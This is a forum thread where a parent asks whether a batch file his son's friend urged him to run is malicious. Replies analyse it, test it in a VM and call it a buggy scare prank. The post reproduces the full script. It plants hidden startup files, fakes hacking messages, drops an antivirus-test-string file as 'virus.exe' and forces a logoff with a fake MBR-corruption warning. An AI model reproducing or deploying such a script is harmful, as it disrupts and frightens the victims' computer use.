Sons "friend" tryingbto get him to run this

peige

peige

peige

Soldato
Joined
18 Oct 2002
Posts
3,714
Location
Sussex
My sons mate got him to create a bat file with the below code in it.

Looks to me like its main aim is to scare him but does it also do anything malicious?

He didnt run it, he emailed it to me instead.

@Echo off
if exist "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat" goto done

echo @Echo off > "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"
echo title Kick >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"
set trig=01 >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"
rem change the above trig value to any date you want the file to run

set datee=%date% >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"
set datee1=%datee:~7,2% >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"

if not "%trig%"=="%datee1%" goto :dud >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"
echo start "C:\WINDOWS\system32\switch.bat" >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"
echo exit >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"
echo :dud >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"
echo exit >> "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"
attrib +h "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\kick.bat"

if exist "C:\WINDOWS\system32/switch.bat" goto done

echo @Echo off > "C:\WINDOWS\system32\switch.bat"
echo color 07 >> "C:\WINDOWS\system32\switch.bat"
echo title Connecting from 135.234.77.11 >> "C:\WINDOWS\system32\switch.bat"
echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo HOST MACHINE FOUND........................... >> "C:\WINDOWS\system32\switch.bat"
echo set count1=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a1 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count1%"=="500" goto next1 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count1+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a1 >> "C:\WINDOWS\system32\switch.bat"
echo :next1 >> "C:\WINDOWS\system32\switch.bat"

echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo ACQURING HOST IP ADDRESS..................... >> "C:\WINDOWS\system32\switch.bat"
echo set count2=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a2 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count2%"=="500" goto next2 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count2+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a2 >> "C:\WINDOWS\system32\switch.bat"
echo :next2 >> "C:\WINDOWS\system32\switch.bat"

echo ipconfig/all >> "C:\WINDOWS\system32\switch.bat"
echo echo HOST IP ADDRESS ACQURIED..................... >> "C:\WINDOWS\system32\switch.bat"
echo set count3=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a3 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count3%"=="500" goto next3 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count3+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a3 >> "C:\WINDOWS\system32\switch.bat"
echo :next3 >> "C:\WINDOWS\system32\switch.bat"

echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo SEARCHING FOR OPEN TERMINALS................. >> "C:\WINDOWS\system32\switch.bat"
echo set count4=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a4 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count4%"=="500" goto next4 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count4+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a4 >> "C:\WINDOWS\system32\switch.bat"
echo :next4 >> "C:\WINDOWS\system32\switch.bat"

echo set count5=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a5 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count5%"=="500" goto next5 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count5+=1 >> "C:\WINDOWS\system32\switch.bat"
echo echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% >> "C:\WINDOWS\system32\switch.bat"
echo goto a5 >> "C:\WINDOWS\system32\switch.bat"
echo:next5 >> "C:\WINDOWS\system32\switch.bat"
echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo OPEN TERMINAL FOUND........................... >> "C:\WINDOWS\system32\switch.bat"
echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% >> "C:\WINDOWS\system32\switch.bat"
echo set count6=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a6 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count6%"=="500" goto next6 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count6+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a6 >> "C:\WINDOWS\system32\switch.bat"
echo :next6 >> "C:\WINDOWS\system32\switch.bat"

echo echo.
echo echo INITIATING BRUTE FORCE ATTACK ON FIREWALL..... >> "C:\WINDOWS\system32\switch.bat"
echo set count7=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a7 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count7%"=="500" goto next7 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count7+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a7 >> "C:\WINDOWS\system32\switch.bat"
echo :next7 >> "C:\WINDOWS\system32\switch.bat"

echo set count8=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a8 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count8%"=="500" goto next8 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count8+=1 >> "C:\WINDOWS\system32\switch.bat"
echo echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% >> "C:\WINDOWS\system32\switch.bat"
echo goto a8 >> "C:\WINDOWS\system32\switch.bat"
echo :next8 >> "C:\WINDOWS\system32\switch.bat"

echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo FIREWALL DISABLED............................. >> "C:\WINDOWS\system32\switch.bat"
echo set count9=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a9 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count9%"=="500" goto next9 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count9+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a9 >> "C:\WINDOWS\system32\switch.bat"
echo :next9 >> "C:\WINDOWS\system32\switch.bat"

echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo COPYING ALL FILES............................. >> "C:\WINDOWS\system32\switch.bat"
echo set count10=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a10 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count10%"=="500" goto next10 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count10+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a10 >> "C:\WINDOWS\system32\switch.bat"
echo :next10 >> "C:\WINDOWS\system32\switch.bat"

echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo dir /s >> "C:\WINDOWS\system32\switch.bat"
echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo COPYING COMPLETE.............................. >> "C:\WINDOWS\system32\switch.bat"
echo set count11=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a11 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count11%"=="500" goto next11 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count11+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a11 >> "C:\WINDOWS\system32\switch.bat"
echo :next11 >> "C:\WINDOWS\system32\switch.bat"

echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo INSTALLING K1ll5W1T(H.exe..................... >> "C:\WINDOWS\system32\switch.bat"

echo copy "C:\WINDOWS\system32\vback.nrk" "C:\WINDOWS\virus.exe" >> "C:\WINDOWS\system32\switch.bat"
echo set count12=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a12 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count12%"=="500" goto next12 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count12+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a12 >> "C:\WINDOWS\system32\switch.bat"
echo :next12 >> "C:\WINDOWS\system32\switch.bat"

echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo K1ll5W1T(H.exe INSTALLATION COMPLETE.......... >> "C:\WINDOWS\system32\switch.bat"
echo set count13=0 >> "C:\WINDOWS\system32\switch.bat"
echo :a13 >> "C:\WINDOWS\system32\switch.bat"
echo if "%count13%"=="500" goto next13 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count13+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a13 >> "C:\WINDOWS\system32\switch.bat"
echo :next13 >> "C:\WINDOWS\system32\switch.bat"

echo echo. >> "C:\WINDOWS\system32\switch.bat"
echo echo EXECUTING K1ll5W1T(H.exe...................... >> "C:\WINDOWS\system32\switch.bat"
echo start "C:\WINDOWS\virus.exe" >> "C:\WINDOWS\system32\switch.bat"
echo set count14=0 >> "C:\WINDOWS\system32/switch.bat"
echo :a14 >> "C:\WINDOWS\system32/switch.bat"
echo if "%count14%"=="500" goto next14 >> "C:\WINDOWS\system32\switch.bat"
echo set /a count14+=1 >> "C:\WINDOWS\system32\switch.bat"
echo goto a14 >> "C:\WINDOWS\system32\switch.bat"
echo :next14 >> "C:\WINDOWS\system32\switch.bat"

echo shutdown -l -tp 30 -c "MBR Corrupted! Windows is Shutting Down" >> "C:\WINDOWS\system32\switch.bat"
echo exit >> "C:\WINDOWS\system32\switch.bat"
attrib +h "C:\WINDOWS\system32\switch.bat"

if exist "C:\WINDOWS\system32\vback.nrk" goto done
echo X5O!P%@AP[4\PZX54(P^)7CC)7}$K1ll5W1T(H ALERT CORRUPTING SYSTEM SHUTDOWN!$H+H* > "C:\WINDOWS\system32\vback.nrk"
attrib +h "C:\WINDOWS\system32\vback.nrk"

:done
echo dir/s > %0
exit
 
I don't have a clue but the very bottom line states about corrupting system shutdown.

tempted to run it on a VM and see what happens lol
 
Looks a bit suspect to me - why bother to run it at all. I would delete it myself. If it was given to him by a friend - there must surely have been some purpose of this file mentioned somewhere?
 
Looks to be a scare rather than malicious. Writes some crap to a variety of batch files to be run sequentially. One if which shutdown your machine with a snotty message.

Delete it and respond with "Well Played signor".
 
tested it on a VM I was getting rid of and copied what was above and saved it as a bat file.

ran it and cmd box appeared and then nothing else happen, no re starts or messages, this was a windows 7 vm
 
It looks like it drops files to be run on startup. Reboot your VM and see if you get a load of messages about copying files and brute force attacks on your firewall, and a corrupt MBR and then a shutdown?
 
Skeeter said:
It looks like it drops files to be run on startup. Reboot your VM and see if you get a load of messages about copying files and brute force attacks on your firewall, and a corrupt MBR and then a shutdown?
Click to expand...

I have rebooted it, doesn't seem to do anything.
 
I would be letting the kids parents know (or maybe you talk to him privately), because it could turn from a joke to malicious very quickly and get himself I serious crap being naive.
 
Someone must have been really bored, if the extra file is included it can trip a false positive on some anti-virus programs otherwise nothing particularly harmful.

I doubt its the original work of the friend in question as several similar variants are floating around.
 
Last edited:
Funny that he's got typo's in it, maybe we should sort it out and send it back to him!

I told my Son to to do anything the kid asks him to do, he comes across as some kind of wanabe hacker going on about vpn's and botnets, it was that that made me wonder if there was a subtext to the bat file that I was missing.
My son is obviously intrigued by the kid who has jailbroken phones and a seemingly extensive knowledge of programming, although he doesn't.

Aged 15 he doesn't know much about command line and batch files but this episode has made him interested in what goes on under the bonnet of windows which isn't a bad thing, at least he has the spider sense that told him not to run what he was being told to run.
 
peige said:
Funny that he's got typo's in it, maybe we should sort it out and send it back to him!

I told my Son to to do anything the kid asks him to do, he comes across as some kind of wanabe hacker going on about vpn's and botnets, it was that that made me wonder if there was a subtext to the bat file that I was missing.
My son is obviously intrigued by the kid who has jailbroken phones and a seemingly extensive knowledge of programming, although he doesn't.

Aged 15 he doesn't know much about command line and batch files but this episode has made him interested in what goes on under the bonnet of windows which isn't a bad thing, at least he has the spider sense that told him not to run what he was being told to run.
Click to expand...

a shame he cant type otherwise it may have worked if anyone ran it lol.
 
I wanted my son to understand what kind of friend he had, it was ether the sort that wanted to scare him for a laugh or one that shouldn't be trusted.. turns out its both really.
 
shutdown -l -tp 30 -c

Only part that does anything from what I can see and it's filled with typos so probably wouldn't work anyway as people have mentioned. At most it shuts the PC down and gives the user a fright.

Thing is as harmless as it is the intention is clear, to annoy and make the PC repeatedly do it, hence the attrib changes they attempt to make, what an idiot.
 
Would need to run it as the admin, not just admin user to get it to do anything but just looks like it pops up some messages then shuts down the pc.

Also it adds itself to the users start-up folder (pre Vista users only mind thanks to its poor coding!) so will shut it down every 30seconds the user is logged in.

If UAC is enabled it wont do nothing.
 
Last edited:
You must log in or register to reply here.
Back
Top Bottom